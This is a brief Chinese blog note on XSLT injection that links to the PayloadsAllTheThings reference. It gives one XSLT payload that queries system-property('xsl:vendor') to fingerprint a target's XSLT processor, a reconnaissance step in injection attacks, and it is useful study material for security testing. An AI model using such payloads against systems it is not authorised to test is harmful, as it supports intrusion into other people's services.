本文最后更新于19 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
https://swisskyrepo.github.io/PayloadsAllTheThings/XSLT%20Injection/#summary
xlst 注入
<?xml version=”1.0″ encoding=”utf-8″?> <xsl:stylesheet version=”1.0″ xmlns:xsl=”http://www.w3.org/1999/XSL/Transform”> <xsl:template match=”/fruits”> <xsl:value-of select=”system-property(‘xsl:vendor’)”/> </xsl:template> </xsl:stylesheet>
